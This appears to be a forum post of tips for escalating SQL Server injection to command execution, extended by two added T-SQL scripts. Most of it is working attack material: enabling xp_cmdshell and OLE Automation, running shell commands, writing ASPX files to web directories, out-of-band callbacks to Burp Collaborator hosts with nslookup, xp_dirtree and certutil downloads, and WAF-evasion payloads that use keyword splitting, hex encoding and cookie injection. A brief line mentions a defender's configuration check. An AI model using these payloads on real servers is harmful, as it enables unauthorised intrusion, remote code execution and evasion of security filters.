Posted: 2021-07-01 10:21:17
Some tips on getting from SQL Server injection to command execution:
Basics:

1. Enable xp_cmdshell:
   EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
   EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
   Run a command (here an out-of-band check against a DNS-log host):
   exec master..xp_cmdshell 'ping dnslog'

2. Enable sp_oacreate (OLE Automation Procedures):
   EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
   EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE;

3. Call sp_oamethod:
   Run a command through WScript.Shell:
   declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\1.txt'
   The same thing URL-encoded for a GET injection point, using nslookup for a DNS callback (nslookup expects a bare hostname, so in practice drop the http:// prefix):
   ;declare+%40shell+int+exec+sp_oacreate+'wscript.shell',%40shell+output+exec+sp_oamethod+%40shell,'run',null,'c%3a\windows\system32\nslookup.exe%20"http://2ruqida2pbiyia3mnwnsaiadu40vok.burpcollaborator.net"';
   Write a file through Scripting.FileSystemObject (CreateTextFile returns a TextStream handle, which is stored back into @f and then used for WriteLine; @g is declared but never used). Here it writes minimal ASPX markup into the file:
   ;declare+@f+int,@g+int;exec+sp_oacreate+%27Scripting.FileSystemObject%27,@f+output;EXEC+SP_OAMETHOD+@f,%27CreateTextFile%27,@f+OUTPUT,%27d:\Dzts\zt\admin\65.txt%27,1;EXEC+sp_oamethod+@f,%27WriteLine%27,null,%27<%@+Page+Language="C%23"%><%+Response.Write("hello,world");+%>%27--

About bypasses:
exec is the same as execute.
Original statement:  execute master..xp_dirtree 'c:'
Rewritten:           execute('master..xp_dirtree "c:" ')
(EXEC accepts a double-quoted or unquoted identifier as a procedure argument, so no single quotes are needed inside the execute() string.)
Rewritten again, pointing xp_dirtree at a UNC path so the server resolves an attacker-controlled hostname:
execute('master..xp_dirtree "\\im86rc9bogsvyfv87zip9sz34uaky9.burpcollaborator.net"' )
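As an added example (not code from the original post), the xp_cmdshell and OLE Automation steps above combined into one T-SQL script that first reads the current configuration from sys.configurations, captures xp_cmdshell output in-band through a temp table, and checks the HRESULT of each sp_OA* call with sp_OAGetErrorInfo instead of failing silently. It assumes a sysadmin session and uses C:\Windows\Temp\out.txt as a scratch path; both are assumptions.

```sql
-- Added example, not code from the original post. Assumes a sysadmin session;
-- the path C:\Windows\Temp\out.txt is an assumed scratch location.

-- 1. Current state of the relevant options (value_in_use = 1 means enabled).
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures');

-- 2. Enable both mechanisms, one RECONFIGURE after each change.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

-- 3. xp_cmdshell returns stdout as a rowset, so when the injection point
--    returns results the output can be read in-band instead of via DNS.
CREATE TABLE #out (line NVARCHAR(4000));
INSERT INTO #out EXEC master..xp_cmdshell 'whoami';
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;

-- 4. OLE Automation variant. sp_OACreate/sp_OAMethod return 0 on success;
--    on failure sp_OAGetErrorInfo returns the COM source and description.
DECLARE @hr INT, @shell INT, @fso INT, @ts INT, @text VARCHAR(8000),
        @src VARCHAR(255), @desc VARCHAR(255);

EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @shell, @src OUTPUT, @desc OUTPUT;
    RAISERROR('sp_OACreate WScript.Shell failed: %s %s', 16, 1, @src, @desc);
    RETURN;
END;

-- WScript.Shell.Run(command, windowStyle, waitOnReturn):
-- windowStyle 0 = hidden, waitOnReturn 1 = block until the process exits,
-- so the output file is complete before it is read back below.
EXEC @hr = sp_OAMethod @shell, 'Run', NULL,
     'cmd.exe /c whoami > C:\Windows\Temp\out.txt', 0, 1;
IF @hr <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @shell, @src OUTPUT, @desc OUTPUT;
    RAISERROR('Run failed: %s %s', 16, 1, @src, @desc);
    RETURN;
END;

-- Read the file back through Scripting.FileSystemObject.
-- OpenTextFile(path, 1) opens for reading and returns a TextStream handle.
EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT;
EXEC @hr = sp_OAMethod @fso, 'OpenTextFile', @ts OUTPUT, 'C:\Windows\Temp\out.txt', 1;
EXEC @hr = sp_OAMethod @ts, 'ReadAll', @text OUTPUT;
SELECT @text AS whoami_output;

-- Release the COM objects; otherwise the handles live until the batch ends.
EXEC sp_OADestroy @ts;
EXEC sp_OADestroy @fso;
EXEC sp_OADestroy @shell;
```

The first SELECT is also the quickest check a defender can run: any row with value_in_use = 1 for xp_cmdshell or Ole Automation Procedures on a server that does not need them is worth an alert.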
Running a command with the bypass (the keyword is split so that "xp_cmdshell" never appears contiguously in the request; execute() concatenates the pieces at run time):
';execute('xp_c'%2b'mdshell " certutil.exe -urlcache -split -f http://cyen6bl8kg2svupmggzc6dk1zs5it7.burpcollaborator.net"');--%20111
Decoded: ';execute('xp_c'+'mdshell " certutil.exe -urlcache -split -f http://cyen6bl8kg2svupmggzc6dk1zs5it7.burpcollaborator.net"');-- 111
Enabling xp_cmdshell with a bypass (double-quoted strings, so the single quotes inside need no doubling):
execute("sp_configure 'show advanced options', 1");RECONFIGURE;execute("sp_configure 'xp_cmdshell', 1;RECONFIGURE");
Note that double quotes delimit a string literal only while SET QUOTED_IDENTIFIER is OFF; with it ON they delimit an identifier.

A SQL Server-specific quirk: select 1e1select user is executed as select 1e1 followed by select user, because the float literal 1e1 ends its token and the next keyword needs no separating space. That helps against a WAF that keys on whitespace:
'select 1e1declare @s varchar (8000) set @s=0x77616974666F722064656C61792027303A303A3227 exec (@s) -- a
(the hex literal decodes to waitfor delay '0:0:2', a time-based blind probe; the varbinary value is implicitly converted to varchar on assignment)

Case: ASPX/.NET sites accept parameters from GET, POST and cookies alike (Request["name"] searches the query string, form and cookies), so a payload blocked in the query string can be sent as a cookie instead.
Put the GET parameter into the cookie:
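An added example (not code from the original post) that ties the bypass tricks above together: producing the hex literal with CONVERT, decoding a captured one, the whitespace-free 1e1 chaining, the split keyword inside execute(), and the double-quoted string form with the session setting it depends on. The 0x7761... literal from the tip decodes to waitfor delay '0:0:2'. Everything is plain T-SQL for any SQL Server session; no particular target is assumed.

```sql
-- Added example, not code from the original post. Plain T-SQL; the bypass
-- forms are the same ones used in the tips above.

-- Build the hex literal for a statement so that its keywords never appear in
-- the request in clear text. CONVERT to VARBINARY yields the 0x... form.
SELECT CONVERT(VARBINARY(MAX), 'waitfor delay ''0:0:2''') AS hex_payload;

-- Decode a captured literal before replaying it, to know what it does.
SELECT CONVERT(VARCHAR(8000), 0x77616974666F722064656C61792027303A303A3227) AS decoded;
GO

-- Whitespace-free chaining: the float literal 1e1 ends its token, so the next
-- keyword may follow with no space. The two batches below are equivalent.
select 1e1declare @s varchar(8000) set @s=0x77616974666F722064656C61792027303A303A3227 exec(@s)
GO
SELECT 1e1;
DECLARE @s VARCHAR(8000);
SET @s = 'waitfor delay ''0:0:2''';   -- the hex form above relies on implicit varbinary->varchar conversion
EXEC (@s);
GO

-- Keyword splitting: EXEC() accepts a concatenated string expression, so
-- 'xp_cmdshell' is only assembled at run time, never sent contiguously.
EXEC ('xp_c' + 'mdshell ''whoami''');
GO

-- Double-quoted string: single quotes inside need no doubling, useful when the
-- injection lands inside a single-quoted literal. It depends on
-- QUOTED_IDENTIFIER being OFF; with it ON, "..." is parsed as an identifier.
SET QUOTED_IDENTIFIER OFF;
GO
EXEC ("sp_configure 'show advanced options', 1");
RECONFIGURE;
GO
```

When replaying a GET payload as a cookie, the same bytes go into the Cookie header value instead of the query string; the SQL side is unchanged.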